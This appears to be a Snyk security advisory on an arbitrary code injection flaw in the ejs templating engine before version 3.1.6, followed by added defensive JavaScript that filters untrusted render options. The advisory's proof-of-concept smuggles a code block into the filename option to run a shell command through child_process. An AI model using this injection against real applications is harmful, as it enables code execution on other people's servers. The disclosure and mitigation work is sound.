Arbitrary Code Injection Affecting org.webjars.npm:ejs package, versions [,3.1.6)
Threat Intelligence
Exploit Maturity: Proof of concept
- Snyk ID SNYK-JAVA-ORGWEBJARSNPM-1062743
- published 20 Jan 2021
- disclosed 9 Dec 2020
- credit fangzequn
How to fix?
Upgrade org.webjars.npm:ejs to version 3.1.6 or higher.
Overview
org.webjars.npm:ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile functions. If external input flows into the options parameter, an attacker is able to run arbitrary code. This includes the filename, compileDebug, and client options.
POC
let ejs = require('ejs')
ejs.render('./views/test.ejs', {
  filename: '/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
  compileDebug: true,
  message: 'test',
  client: true
})
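The condition named in the overview, external input flowing into the options parameter, can also be closed off at the call site, in addition to upgrading. The following is an added example, not code from the advisory or from ejs; safeLocals, renderArgs, FIXED_OPTIONS and the sample request body are hypothetical names constructed for illustration.

```javascript
// Added example (hypothetical helper names; not part of ejs or the advisory).
// Option names the advisory lists as dangerous when attacker-controlled.
const EJS_OPTION_KEYS = new Set(['filename', 'compileDebug', 'client']);

// Options are fixed in server code and never merged with request data.
const FIXED_OPTIONS = Object.freeze({ compileDebug: false, client: false });

// Copy only allowlisted, primitive template variables out of untrusted input.
function safeLocals(untrusted, allowedKeys) {
  const locals = Object.create(null); // no inherited properties
  const rejected = [];
  if (untrusted === null || typeof untrusted !== 'object' || Array.isArray(untrusted)) {
    return { locals, rejected };
  }
  for (const key of Object.keys(untrusted)) {
    const value = untrusted[key];
    const primitive = ['string', 'number', 'boolean'].includes(typeof value);
    if (EJS_OPTION_KEYS.has(key) || !allowedKeys.includes(key) || !primitive) {
      rejected.push(key); // worth logging: option names in a request body are a signal
      continue;
    }
    locals[key] = value;
  }
  return { locals, rejected };
}

// Build the (template, data, options) triple to hand to ejs.render.
function renderArgs(template, untrusted, allowedKeys) {
  const { locals, rejected } = safeLocals(untrusted, allowedKeys);
  return { args: [template, locals, { ...FIXED_OPTIONS }], rejected };
}

// Constructed sample: a request body carrying the option names from the advisory.
const SAMPLE_BODY = {
  message: 'test',
  filename: 'attacker-controlled value',
  compileDebug: true,
  client: true,
};

const result = renderArgs('<p><%= message %></p>', SAMPLE_BODY, ['message']);
console.log('rejected keys:', result.rejected);
// With ejs installed: ejs.render(...result.args)
```

Only `message` reaches the template data here; the three option names are dropped and reported so they can be logged.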